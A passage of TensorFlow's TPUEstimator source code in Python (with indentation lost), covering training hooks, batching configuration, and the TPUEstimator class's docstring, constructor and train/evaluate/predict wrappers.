# We duplicate this code from the TPUInfeedOutfeedSessionHook rather than
# create a separate hook to guarantee execution order, because summaries
# need to be initialized before the outfeed thread starts.
# TODO(jhseu): Make a wrapper hook instead?
self._init_ops = contrib_summary.summary_writer_initializer_op()
# Get all the writer resources from the initializer, so we know what to
# flush.
self._finalize_ops = []
for op in self._init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def after_create_session(self, session, coord):
session.run(self._init_ops)
def before_run(self, run_context):
return basic_session_run_hooks.SessionRunArgs(self._tensors)
def end(self, session):
session.run(self._finalize_ops)
class ExamplesPerSecondHook(basic_session_run_hooks.StepCounterHook):
"""Calculate and report global_step/sec and examples/sec during runtime."""
def __init__(self,
batch_size,
every_n_steps=100,
every_n_secs=None,
output_dir=None,
summary_writer=None):
self._batch_size = batch_size
super(ExamplesPerSecondHook, self).__init__(
every_n_steps=every_n_steps,
every_n_secs=every_n_secs,
output_dir=output_dir,
summary_writer=summary_writer)
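  # Invoked by StepCounterHook every N steps (or secs); derives examples/sec
  # from global_step/sec and the configured global batch size, and writes
  # both as summaries.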
def _log_and_record(self, elapsed_steps, elapsed_time, global_step):
global_step_per_sec = elapsed_steps / elapsed_time
examples_per_sec = self._batch_size * global_step_per_sec
if self._summary_writer is not None:
global_step_summary = Summary(value=[
Summary.Value(tag='global_step/sec', simple_value=global_step_per_sec)
])
example_summary = Summary(value=[
Summary.Value(tag='examples/sec', simple_value=examples_per_sec)
])
self._summary_writer.add_summary(global_step_summary, global_step)
self._summary_writer.add_summary(example_summary, global_step)
logging.info('global_step/sec: %g', global_step_per_sec)
logging.info('examples/sec: %g', examples_per_sec)
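# Example usage (hypothetical values): report global_step/sec and examples/sec
# every 100 steps for a global batch size of 1024:
#   hooks = [ExamplesPerSecondHook(batch_size=1024, every_n_steps=100)]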
class InstallSignalHandlerHook(session_run_hook.SessionRunHook):
"""Change SIGINT (CTRL^C) handler to force quit the process.
The default behavior often results in hanging processes.
The original handler is restored after training/evaluation.
"""
def __init__(self):
self._signal_fn = signal.getsignal(signal.SIGINT)
def before_run(self, run_context):
signal.signal(signal.SIGINT, signal.SIG_DFL)
def end(self, session):
signal.signal(signal.SIGINT, self._signal_fn)
class ExportSavedModelApiVersion(enum.Enum):
V1 = 1
V2 = 2
class BatchConfig(
collections.namedtuple('BatchConfig', [
'num_batch_threads', 'max_batch_size', 'batch_timeout_micros',
'allowed_batch_sizes', 'max_enqueued_batches'
])):
"""Class to handle config inputs into the batching function."""
def __new__(cls,
num_batch_threads,
max_batch_size,
batch_timeout_micros,
allowed_batch_sizes,
max_enqueued_batches=10):
"""Creates an EmbeddingConfigSpec instance.
Args:
num_batch_threads: Number of scheduling threads for processing batches of
work. Determines the number of batches processed in parallel.
max_batch_size: Batch sizes will never be bigger than this.
batch_timeout_micros: Maximum number of microseconds to wait before
outputting an incomplete batch.
allowed_batch_sizes: Optional list of allowed batch sizes. If left empty,
does nothing. Otherwise, supplies a list of batch sizes, causing the op
to pad batches up to one of those sizes. The entries must increase
monotonically, and the final entry must equal max_batch_size.
max_enqueued_batches: The maximum depth of the batch queue. Defaults to
10.
Returns:
      A BatchConfig instance.
"""
return super(BatchConfig, cls).__new__(
cls,
num_batch_threads=num_batch_threads,
max_batch_size=max_batch_size,
batch_timeout_micros=batch_timeout_micros,
allowed_batch_sizes=allowed_batch_sizes,
max_enqueued_batches=max_enqueued_batches)
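# Example usage (hypothetical values): pad inference batches to 8 or 16
# examples and wait at most 10ms for a batch to fill:
#   batch_config = BatchConfig(
#       num_batch_threads=2, max_batch_size=16, batch_timeout_micros=10000,
#       allowed_batch_sizes=[8, 16])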
@estimator_export(v1=['estimator.tpu.TPUEstimator'])
class TPUEstimator(estimator_lib.Estimator):
"""Estimator with TPU support.
TPUEstimator also supports training on CPU and GPU. You don't need to define
a separate `tf.estimator.Estimator`.
TPUEstimator handles many of the details of running on TPU devices, such as
replicating inputs and models for each core, and returning to host
periodically to run hooks.
TPUEstimator transforms a global batch size in params to a per-shard batch
  size when calling the `input_fn` and `model_fn`. Users should specify the
  global batch size in the constructor, and then get the batch size for each
  shard in `input_fn` and `model_fn` from `params['batch_size']`.
- For training, `model_fn` gets per-core batch size; `input_fn` may get
per-core or per-host batch size depending on `per_host_input_for_training`
in `TPUConfig` (See docstring for TPUConfig for details).
- For evaluation and prediction, `model_fn` gets per-core batch size and
    `input_fn` gets per-host batch size.
Evaluation
==========
`model_fn` should return `TPUEstimatorSpec`, which expects the `eval_metrics`
for TPU evaluation. If eval_on_tpu is False, the evaluation will execute on
CPU or GPU; in this case the following discussion on TPU evaluation does not
apply.
`TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`tensors` could be a list of any nested structure of `Tensor`s (See
`TPUEstimatorSpec` for details). `metric_fn` takes the `tensors` and returns
a dict from metric string name to the result of calling a metric function,
namely a `(metric_tensor, update_op)` tuple.
One can set `use_tpu` to `False` for testing. All training, evaluation, and
  prediction will be executed on CPU. `input_fn` and `model_fn` will receive
`train_batch_size` or `eval_batch_size` unmodified as `params['batch_size']`.
Current limitations:
--------------------
1. TPU evaluation only works on a single host (one TPU worker) except
BROADCAST mode.
2. `input_fn` for evaluation should **NOT** raise an end-of-input exception
(`OutOfRangeError` or `StopIteration`). And all evaluation steps and all
batches should have the same size.
Example (MNIST):
----------------
```
# The metric Fn which runs on CPU.
def metric_fn(labels, logits):
predictions = tf.argmax(logits, 1)
return {
'accuracy': tf.compat.v1.metrics.precision(
labels=labels, predictions=predictions),
}
  # Your model Fn which runs on TPU (eval_metrics is a list in this example)
def model_fn(features, labels, mode, config, params):
...
logits = ...
    if mode == tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, [labels, logits]))
# or specify the eval_metrics tensors as dict.
def model_fn(features, labels, mode, config, params):
...
final_layer_output = ...
    if mode == tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, {
'labels': labels,
'logits': final_layer_output,
}))
```
Prediction
==========
Prediction on TPU is an experimental feature to support large batch inference.
  It is not designed for latency-critical systems. In addition, due to some
  usability issues, for prediction with a small dataset, CPU `.predict`, i.e.,
creating a new `TPUEstimator` instance with `use_tpu=False`, might be more
convenient.
Note: In contrast to TPU training/evaluation, the `input_fn` for prediction
*should* raise an end-of-input exception (`OutOfRangeError` or
`StopIteration`), which serves as the stopping signal to `TPUEstimator`. To be
precise, the ops created by `input_fn` produce one batch of the data.
The `predict()` API processes one batch at a time. When reaching the end of
the data source, an end-of-input exception should be raised by one of these
operations. The user usually does not need to do this manually. As long as the
dataset is not repeated forever, the `tf.data` API will raise an end-of-input
exception automatically after the last batch has been produced.
Note: Estimator.predict returns a Python generator. Please consume all the
  data from the generator so that TPUEstimator can shut down the TPU system
  properly for the user.
Current limitations:
--------------------
1. TPU prediction only works on a single host (one TPU worker).
2. `input_fn` must return a `Dataset` instance rather than `features`. In
fact, .train() and .evaluate() also support Dataset as return value.
Example (MNIST):
----------------
```
height = 32
width = 32
total_examples = 100
def predict_input_fn(params):
batch_size = params['batch_size']
images = tf.random.uniform(
[total_examples, height, width, 3], minval=-1, maxval=1)
dataset = tf.data.Dataset.from_tensor_slices(images)
dataset = dataset.map(lambda images: {'image': images})
dataset = dataset.batch(batch_size)
return dataset
def model_fn(features, labels, params, mode):
# Generate predictions, called 'output', from features['image']
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
predictions={
'predictions': output,
'is_padding': features['is_padding']
})
tpu_est = TPUEstimator(
model_fn=model_fn,
...,
predict_batch_size=16)
# Fully consume the generator so that TPUEstimator can shutdown the TPU
# system.
  for item in tpu_est.predict(input_fn=predict_input_fn):
# Filter out item if the `is_padding` is 1.
# Process the 'predictions'
```
Exporting
=========
`export_saved_model` exports 2 metagraphs, one with `saved_model.SERVING`, and
another with `saved_model.SERVING` and `saved_model.TPU` tags. At serving
time, these tags are used to select the appropriate metagraph to load.
Before running the graph on TPU, the TPU system needs to be initialized. If
TensorFlow Serving model-server is used, this is done automatically. If not,
please use `session.run(tpu.initialize_system())`.
There are two versions of the API: ExportSavedModelApiVersion.V1 and V2.
In V1, the exported CPU graph is `model_fn` as it is. The exported TPU graph
wraps `tpu.rewrite()` and `TPUPartitionedCallOp` around `model_fn` so
`model_fn` is on TPU by default. To place ops on CPU,
`tpu.outside_compilation(host_call, logits)` can be used.
Example:
----------------
```
def model_fn(features, labels, mode, config, params):
...
logits = ...
export_outputs = {
'logits': export_output_lib.PredictOutput(
{'logits': logits})
}
def host_call(logits):
class_ids = math_ops.argmax(logits)
classes = string_ops.as_string(class_ids)
      export_outputs['classes'] = export_output_lib.ClassificationOutput(
          classes=classes)
tpu.outside_compilation(host_call, logits)
...
```
In V2, `export_saved_model()` sets up `params['use_tpu']` flag to let the user
know if the code is exporting to TPU (or not). When `params['use_tpu']` is
`True`, users need to call `tpu.rewrite()`, `TPUPartitionedCallOp` and/or
`batch_function()`. Alternatively use `inference_on_tpu()` which is a
convenience wrapper of the three.
```
def model_fn(features, labels, mode, config, params):
...
# This could be some pre-processing on CPU like calls to input layer with
# embedding columns.
x2 = features['x'] * 2
def computation(input_tensor):
return layers.dense(
input_tensor, 1, kernel_initializer=init_ops.zeros_initializer())
inputs = [x2]
if params['use_tpu']:
predictions = array_ops.identity(
tpu_estimator.inference_on_tpu(computation, inputs,
num_batch_threads=1, max_batch_size=2, batch_timeout_micros=100),
name='predictions')
else:
predictions = array_ops.identity(
computation(*inputs), name='predictions')
key = signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY
export_outputs = {
key: export_lib.PredictOutput({'prediction': predictions})
}
...
```
TIP: V2 is recommended as it is more flexible (eg: batching, etc).
"""
def __init__(self,
model_fn=None,
model_dir=None,
config=None,
params=None,
use_tpu=True,
train_batch_size=None,
eval_batch_size=None,
predict_batch_size=None,
batch_axis=None,
eval_on_tpu=True,
export_to_tpu=True,
export_to_cpu=True,
warm_start_from=None,
experimental_export_device_assignment=False,
embedding_config_spec=None,
export_saved_model_api_version=ExportSavedModelApiVersion.V1):
"""Constructs an `TPUEstimator` instance.
Args:
model_fn: Model function as required by `Estimator` which returns
        EstimatorSpec or TPUEstimatorSpec. `training_hooks`, `evaluation_hooks`,
        and `prediction_hooks` must not capture any TPU Tensor inside the
model_fn.
      model_dir: Directory to save model parameters, graph, etc. This can
        also be used to load checkpoints from the directory into an estimator to
        continue training a previously saved model. If `None`, the model_dir in
        `config` will be used if set. If both are set, they must be the same. If
both are `None`, a temporary directory will be used.
      config: A `tpu_config.RunConfig` configuration object. Cannot be `None`.
params: An optional `dict` of hyper parameters that will be passed into
`input_fn` and `model_fn`. Keys are names of parameters, values are
basic python types. There are reserved keys for `TPUEstimator`,
including 'batch_size'.
      use_tpu: A bool indicating whether TPU support is enabled. Currently:
        - TPU training and evaluation respect this bit, but eval_on_tpu can
          override execution of eval. See below.
        - Predict still happens on CPU.
train_batch_size: An int representing the global training batch size.
TPUEstimator transforms this global batch size to a per-shard batch
size, as params['batch_size'], when calling `input_fn` and `model_fn`.
Cannot be `None` if `use_tpu` is `True`. Must be divisible by total
number of replicas.
eval_batch_size: An int representing evaluation batch size. Must be
divisible by total number of replicas.
predict_batch_size: An int representing the prediction batch size. Must be
divisible by total number of replicas.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards. For example, if your input_fn produced (images, labels)
where the images tensor is in `HWCN` format, your shard dimensions would
be [3, 0], where 3 corresponds to the `N` dimension of your images
Tensor, and 0 corresponds to the dimension along which to split the
labels to match up with the corresponding images. If None is supplied,
and per_host_input_for_training is True, batches will be sharded based
on the major dimension. If tpu_config.per_host_input_for_training is
False or `PER_HOST_V2`, batch_axis is ignored.
eval_on_tpu: If False, evaluation runs on CPU or GPU. In this case, the
model_fn must return `EstimatorSpec` when called with `mode` as `EVAL`.
export_to_tpu: If True, `export_saved_model()` exports a metagraph for
serving on TPU. Note that unsupported export modes such as EVAL will be
ignored. For those modes, only a CPU model will be exported.
Currently, export_to_tpu only supports PREDICT.
export_to_cpu: If True, `export_saved_model()` exports a metagraph for
serving on CPU.
warm_start_from: Optional string filepath to a checkpoint or SavedModel to
warm-start from, or a `tf.estimator.WarmStartSettings` object to fully
configure warm-starting. If the string filepath is provided instead of
a `WarmStartSettings`, then all variables are warm-started, and it is
assumed that vocabularies and Tensor names are unchanged.
experimental_export_device_assignment: Whether to include the device
assignment in the exported model. Doing so is useful in case of model
parallel inference but will tie the exported model to the TPU topology
used to export the model.
embedding_config_spec: Optional EmbeddingConfigSpec instance
to support using TPU embedding.
export_saved_model_api_version: ExportSavedModelApiVersion, V1 or V2.
        With V1, `export_saved_model()` adds rewrite() and TPUPartitionedCallOp()
        for the user; while in V2, the user is expected to add rewrite(),
        TPUPartitionedCallOp(), etc. in their model_fn.
        A helper function `inference_on_tpu` is provided for V2.
        brn_tpu_estimator.py includes examples for both versions,
        i.e. TPUEstimatorExportTest and TPUEstimatorExportV2Test.
Raises:
ValueError: `params` has reserved keys already.
"""
if config is None or not isinstance(config, tpu_config.RunConfig):
raise ValueError(
'`config` must be provided with type `tpu_config.RunConfig`')
if params is not None and any(k in params for k in _RESERVED_PARAMS_KEYS):
raise ValueError('{} are reserved keys but existed in params {}.'.format(
_RESERVED_PARAMS_KEYS, params))
if use_tpu:
# Perform some very basic validations. More validations will be found in
# _InternalTPUContext.
if train_batch_size is None:
raise ValueError('`train_batch_size` cannot be `None`')
util_lib.check_positive_integer(train_batch_size, 'train_batch_size')
if (config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.PER_SHARD_V1 and
config.tpu_config.num_cores_per_replica):
raise ValueError(
'Model parallelism only supports per host input for training. '
'Please adjust TPURunconfig.per_host_input_for_training.')
if eval_batch_size is not None:
util_lib.check_positive_integer(eval_batch_size, 'eval_batch_size')
if predict_batch_size is not None:
util_lib.check_positive_integer(predict_batch_size,
'predict_batch_size')
if embedding_config_spec:
if (config.tpu_config.per_host_input_for_training !=
tpu_config.InputPipelineConfig.PER_HOST_V2):
raise ValueError('Only PER_HOST_V2 is supported when using TPU '
'Embedding; got {}.'.format(
config.tpu_config.per_host_input_for_training))
# Verifies the model_fn signature according to Estimator framework.
estimator_lib._verify_model_fn_args(model_fn, params) # pylint: disable=protected-access
# We cannot store config and params in this constructor as parent
# constructor might change them, such as assigning a temp dir for
# config.model_dir.
model_function = self._augment_model_fn(model_fn, batch_axis)
# Overwrite log_step_count_steps to disable TensorLoggingHook and
# StepCounterHook from being created in Estimator. TPUEstimator already
# added equivalent hooks in _augment_model_fn above.
self._log_every_n_steps = config.log_step_count_steps
config = config.replace(log_step_count_steps=None)
# Passing non-None params as wrapped model_fn has it.
params = params or {}
super(TPUEstimator, self).__init__(
model_fn=model_function,
model_dir=model_dir,
config=config,
params=params,
warm_start_from=warm_start_from)
self._iterations_per_training_loop = util_lib.parse_iterations_per_loop(
self._config.tpu_config.iterations_per_loop)
    # In the absence of an explicit `log_every_n_secs` config, if the
    # `iterations_per_loop` value is specified as time in seconds, enable
    # logging every n secs based on the `iterations_per_loop` value. This is a
    # trade-off that avoids an API change in the current release.
# TODO(henrytan): add `log_every_n_secs` to RunConfig.
if self._iterations_per_training_loop.unit == 'seconds':
self._log_every_n_secs = self._iterations_per_training_loop.value
self._log_every_n_steps = None
elif self._iterations_per_training_loop.unit == 'count':
if self._log_every_n_steps is not None:
# Each session.run() lasts for iterations_per_loop. We can't log
# in-between a session.run(), and we can only log after the
# `iterations_per_loop` steps, so we can only approximate. If a user
# requests to log every N steps, we actually want to roughly log every
# N / `iterations_per_loop` steps to match the original intention.
self._log_every_n_steps = (
int(math.ceil(float(self._log_every_n_steps) /
self._iterations_per_training_loop.value)))
self._log_every_n_secs = None
else:
assert False, ('Invalid TPUConfig `iterations_per_loop` value. '
'Indicates a bug in `iterations_per_loop` '
'parsing.')
# All properties passed to _InternalTPUContext are immutable.
# pylint: disable=protected-access
self._ctx = tpu_context._get_tpu_context(
self._config, train_batch_size, eval_batch_size, predict_batch_size,
use_tpu, eval_on_tpu, embedding_config_spec)
self._export_to_cpu = export_to_cpu
self._export_to_tpu = export_to_tpu
self._experimental_export_device_assignment = (
experimental_export_device_assignment)
if not isinstance(export_saved_model_api_version,
ExportSavedModelApiVersion):
raise ValueError('export_saved_model_api_version should be of type '
'ExportSavedModelApiVersion; got {}.'.format(
export_saved_model_api_version))
self._export_saved_model_api_version = export_saved_model_api_version
self._is_input_fn_invoked = None
self._rendezvous = {}
def _add_meta_graph_for_mode(self,
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables=True,
mode=model_fn_lib.ModeKeys.PREDICT,
export_tags=None,
check_variables=True,
strip_default_attrs=True):
if self._export_to_tpu and mode != model_fn_lib.ModeKeys.PREDICT:
logging.warning('TPUEstimator only handles mode PREDICT for exporting '
'when `export_to_tpu` is `True`; Mode {} will be ignored '
'for TPU.'.format(mode))
if not self._export_to_cpu and not self._export_to_tpu:
raise ValueError('One of export_to_cpu and export_to_tpu must be true.')
if self._export_to_cpu:
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables,
strip_default_attrs=strip_default_attrs))
if self._export_to_tpu and mode == model_fn_lib.ModeKeys.PREDICT:
input_receiver_fn_map = {
_INFERENCE_ON_TPU_MODE: input_receiver_fn_map[mode]
}
export_tags = [tag_constants.SERVING, tag_constants.TPU]
mode = _INFERENCE_ON_TPU_MODE
# See b/110052256 for why `check_variables` is `False`.
if not self._export_to_cpu:
check_variables = save_variables = True
else:
check_variables = save_variables = False
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables=save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables,
strip_default_attrs=strip_default_attrs))
def _call_model_fn(self, features, labels, mode, config):
if self._export_saved_model_api_version == ExportSavedModelApiVersion.V1:
if mode == _INFERENCE_ON_TPU_MODE:
return self._call_model_fn_for_inference(features, labels, mode, config)
else:
return super(TPUEstimator, self)._call_model_fn(features, labels, mode,
config)
else:
return super(TPUEstimator, self)._call_model_fn(features, labels, mode,
config)
def _call_model_fn_for_inference(self, features, labels, mode, config):
"""Wraps `_call_model_fn` for `export_saved_model`."""
if mode != _INFERENCE_ON_TPU_MODE:
raise ValueError('mode must be {}; '
'got {}.'.format(_INFERENCE_ON_TPU_MODE, mode))
return model_fn_inference_on_tpu(
self._model_fn,
features,
labels,
config,
self._params,
batch_config=None,
experimental_export_device_assignment=self
._experimental_export_device_assignment,
call_context=self._ctx)
def _create_global_step(self, graph):
"""Creates a global step suitable for TPUs.
Args:
graph: The graph in which to create the global step.
Returns:
A global step `Tensor`.
Raises:
ValueError: if the global step tensor is already defined.
"""
return _create_global_step(graph)
def _convert_train_steps_to_hooks(self, steps, max_steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.TRAIN) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_train_steps_to_hooks(
steps, max_steps)
# On TPU.
if steps is None and max_steps is None:
raise ValueError(
'For TPU training, one of `steps` or `max_steps` must be set. '
'Cannot be both `None`.')
# Estimator.train has explicit positiveness check.
if steps is not None:
util_lib.check_positive_integer(steps, 'Train steps')
if max_steps is not None:
util_lib.check_positive_integer(max_steps, 'Train max_steps')
return [
_TPUStopAtStepHook(
self._iterations_per_training_loop, steps, max_steps)
]
def _convert_eval_steps_to_hooks(self, steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.EVAL) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_eval_steps_to_hooks(steps)
if steps is None:
raise ValueError('Evaluate `steps` must be set on TPU. Cannot be `None`.')
util_lib.check_positive_integer(steps, 'Eval steps')
return [
evaluation._StopAfterNEvalsHook( # pylint: disable=protected-access
num_evals=steps),
_SetEvalIterationsHook(steps)
]
def _call_input_fn(self, input_fn, mode):
"""Calls the input function.
Args:
input_fn: The input function.
mode: ModeKeys
Returns:
      In TPU mode, returns an input_fn to be called later in model_fn.
      Otherwise, calls the input_fn and returns either features or
        (features, labels).
Raises:
ValueError: if input_fn takes invalid arguments or does not have `params`.
"""
input_fn_args = function_utils.fn_args(input_fn)
config = self.config # a deep copy.
kwargs = {}
if 'params' in input_fn_args:
kwargs['params'] = self.params # a deep copy.
else:
raise ValueError('input_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params["batch_size"]'.format(input_fn))
if 'config' in input_fn_args:
kwargs['config'] = config
if 'mode' in input_fn_args:
kwargs['mode'] = mode
# Records the fact input_fn has been invoked.
self._is_input_fn_invoked = True
with self._ctx.with_mode(mode) as ctx:
if (ctx.is_running_on_cpu() and
ctx.is_input_slice_broadcast_to_all_cores()):
raise ValueError('Invalid TPUConfig `eval_training_input_configuration`'
' value. SLICED mode only works on use_tpu = True.')
      # Set the batch size in params first. This helps the user keep the same
      # input_fn for use_tpu=True/False.
batch_size_for_input_fn = ctx.batch_size_for_input_fn
if batch_size_for_input_fn is not None:
        # For SLICED mode (Eval/Predict), the batch_size within TPUEstimator is
        # not the same as in the user input_fn. In TPUEstimator, the batch_size
        # is `per_replica_batch_size` * `num_replicas`, while in the user
        # input_fn, the batch_size is just `per_replica_batch_size`. Here, the
        # value of params['batch_size'] always refers to the value in the user
        # input_fn.
if ctx.is_input_slice_broadcast_to_all_cores() and ctx.num_replicas > 0:
_add_item_to_params(kwargs['params'], _BATCH_SIZE_KEY,
batch_size_for_input_fn // ctx.num_replicas)
else:
_add_item_to_params(kwargs['params'], _BATCH_SIZE_KEY,
batch_size_for_input_fn)
# For export_saved_model, input_fn is never passed to Estimator. So,
# `is_export_mode` must be False.
if ctx.is_running_on_cpu(is_export_mode=False):
with ops.device('/device:CPU:0'):
return input_fn(**kwargs)
# For TPU computation, input_fn should be invoked in a tf.while_loop for
# performance. While constructing the tf.while_loop, the structure of
# inputs returned by the `input_fn` needs to be recorded. The structure
# includes whether features or labels is dict or single Tensor, dict keys,
# tensor shapes, and dtypes. The recorded structure is used to create the
# infeed dequeue ops, which must be wrapped and passed as a Fn, called
# inside the TPU computation, as the TPU computation is wrapped inside a
# tf.while_loop also. So, we either pass input_fn to model_fn or pass
# dequeue_fn to model_fn. Here, `input_fn` is passed directly as
# `features` in `model_fn` signature.
def _input_fn(ctx):
_add_item_to_params(kwargs['params'], _CTX_KEY, ctx)
return input_fn(**kwargs)
return _input_fn
def _validate_features_in_predict_input(self, result):
"""Skip the validation.
    For TPUEstimator, we do not need to check the result type. `_InputPipeline`
    has a stronger check. The parent class's check generates a confusing
    warning message.
Args:
result: `features` returned by input_fn.
"""
pass
def train(self,
input_fn,
hooks=None,
steps=None,
max_steps=None,
saving_listeners=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.TRAIN] = rendezvous
try:
return super(TPUEstimator, self).train(
input_fn=input_fn,
hooks=hooks,
steps=steps,
max_steps=max_steps,
saving_listeners=saving_listeners)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('training_loop', sys.exc_info())
finally:
rendezvous.record_done('training_loop')
rendezvous.raise_errors()
def evaluate(self,
input_fn,
steps=None,
hooks=None,
checkpoint_path=None,
name=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.EVAL] = rendezvous
try:
return super(TPUEstimator, self).evaluate(
input_fn,
steps=steps,
hooks=hooks,
checkpoint_path=checkpoint_path,
name=name)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('evaluation_loop', sys.exc_info())
finally:
rendezvous.record_done('evaluation_loop')
rendezvous.raise_errors()
def predict(self,
input_fn,
predict_keys=None,
hooks=None,
checkpoint_path=None,
yield_single_examples=True):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.PREDICT] = rendezvous
try:
for result in super(TPUEstimator, self).predict(
input_fn=input_fn,
predict_keys=predict_keys,
hooks=hooks,
checkpoint_path=checkpoint_path,
yield_single_examples=yield_single_examples):
yield result
except Exception: # pylint: disable=broad-except
rendezvous.record_error('prediction_loop', sys.exc_info())
finally:
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
def _augment_model_fn(self, model_fn, batch_axis):
"""Returns a new model_fn, which wraps the TPU support."""
def _model_fn(features, labels, mode, config, params):
"""A Estimator `model_fn` for TPUEstimator."""
# `input_fn` is called in `train()`, `evaluate()`, and `predict()`,
# but not in `export_saved_model()`.
if self._is_input_fn_invoked:
is_export_mode = False
else:
is_export_mode = True
# Clear the bit.
self._is_input_fn_invoked = None
if is_export_mode:
if mode == _INFERENCE_ON_TPU_MODE:
_add_item_to_params(params, _USE_TPU_KEY, True)
mode = model_fn_lib.ModeKeys.PREDICT
else:
_add_item_to_params(params, _USE_TPU_KEY, False)
with self._ctx.with_mode(mode) as ctx:
model_fn_wrapper = _ModelFnWrapper(model_fn, config, params, ctx)
# examples_hook is added to training_hooks for both CPU and TPU
# execution.
if (self._log_every_n_steps is not None
or self._log_every_n_secs is not None):
examples_hook = ExamplesPerSecondHook(
ctx.global_batch_size,
# pylint:disable=g-long-ternary
output_dir=(self.model_dir
if not config or config.save_summary_steps
else None),
# pylint:enable=g-long-ternary
every_n_steps=self._log_every_n_steps,
every_n_secs=self._log_every_n_secs)
if ctx.is_running_on_cpu(is_export_mode=is_export_mode):
logging.info('Running %s on CPU', mode)
estimator_spec = model_fn_wrapper.call_without_tpu(
features, labels, is_export_mode=is_export_mode)
if (self._log_every_n_steps is not None
or self._log_every_n_secs is not None):
estimator_spec = estimator_spec._replace(
training_hooks=estimator_spec.training_hooks + (examples_hook,))
return estimator_spec
assert labels is None, '`labels` passed to `model_fn` must be `None`.'
# TPUEstimator._call_input_fn passes `input_fn` as features to here.
assert callable(features), '`input_fn` is not callable.'
input_fn = features
tpu_init_ops = []
if ctx.embedding_config and mode == model_fn_lib.ModeKeys.TRAIN:
dummy_table_variables, dummy_table_variables_init = (
tpu_embedding_gradient.create_dummy_table_variables(
ctx.embedding_config.tpu_embedding))
ctx.embedding_config.dummy_table_variables = dummy_table_variables
tpu_init_ops.append(dummy_table_variables_init)
input_holders = _InputPipeline(input_fn, batch_axis, ctx)
enqueue_ops, dequeue_fn, input_hooks, run_infeed_loop_on_coordinator = (
input_holders.generate_infeed_enqueue_ops_and_dequeue_fn())
graph = ops.get_default_graph()
for enqueue_op in enqueue_ops:
if isinstance(enqueue_op, list):
graph.get_collection_ref(_TPU_ENQUEUE_OPS).extend(enqueue_op)
else:
graph.add_to_collection(_TPU_ENQUEUE_OPS, enqueue_op)
if mode == model_fn_lib.ModeKeys.TRAIN:
compile_op, loss, host_call, scaffold_fn, training_hooks = (
_train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
if ctx.embedding_config:
g = ops.get_default_graph()
table_to_config_dict = (
ctx.embedding_config.tpu_embedding.table_to_config_dict)
optimization_parameters = (
ctx.embedding_config.tpu_embedding.optimization_parameters)
embedding_variable_name_by_table, slot_variable_names_by_table = (
_tpu_estimator_embedding.get_full_variable_names(
g, table_to_config_dict, optimization_parameters
)
)
embedding_variables_and_ops = (
ctx.embedding_config.tpu_embedding.create_variables_and_ops(
embedding_variable_name_by_table,
slot_variable_names_by_table
))
tpu_init_ops.extend(embedding_variables_and_ops.load_ops())
          # scaffold_fn must be called after the variables for TPU embedding
          # have been created on CPU, as the user might reinitialize those from
          # some checkpoint within scaffold_fn.
scaffold = _get_scaffold(scaffold_fn)
host_ops = host_call.create_tpu_hostcall()
shutdown_hooks = []
shutdown_mode = os.environ.get('TF_TPU_GRACEFUL_SHUTDOWN_MODE',
'reset_computation')
if shutdown_mode:
if shutdown_mode == 'shutdown_worker':
finalizer_hooks = [
session_support.ShutdownLameWorkers(),
]
elif shutdown_mode == 'shutdown_all_workers':
finalizer_hooks = [
session_support.ShutdownAllWorkers(),
]
elif shutdown_mode == 'reset_computation':
finalizer_hooks = [
session_support.ResetComputation(),
]
elif not shutdown_mode:
finalizer_hooks = []
else:
raise ValueError(
'Unknown TF_TPU_GRACEFUL_SHUTDOWN_MODE "%s"' % shutdown_mode)
if finalizer_hooks:
shutdown_hooks.append(
session_support.GracefulShutdownHook(
checkpoint_prefix=self.model_dir + '/model.ckpt',
on_shutdown_hooks=finalizer_hooks))
with ops.control_dependencies([loss]):
global_step = array_ops.identity(training.get_global_step())
hooks = input_hooks + shutdown_hooks
hooks.extend([
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
host_ops,
tpu_compile_op=compile_op,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
master=self._config.master,
session_config=self._session_config,
tpu_init_ops=tpu_init_ops),
InstallSignalHandlerHook()
])
if tpu_cluster_resolver.is_running_in_gce():
hooks.extend(
[preempted_hook.CloudTPUPreemptedHook(self._config.cluster)])
if (self._log_every_n_steps is not None
or self._log_every_n_secs is not None):
if self._iterations_per_training_loop.unit == 'count':
examples_hook._set_steps_per_run( # pylint: disable=protected-access
self._iterations_per_training_loop.value)
hooks.append(training.LoggingTensorHook(
{
'loss': array_ops.identity(loss),
'step': global_step,
},
every_n_iter=self._log_every_n_steps,
every_n_secs=self._log_every_n_secs))
hooks.append(examples_hook)
if training_hooks:
hooks.extend(training_hooks)
chief_hooks = []
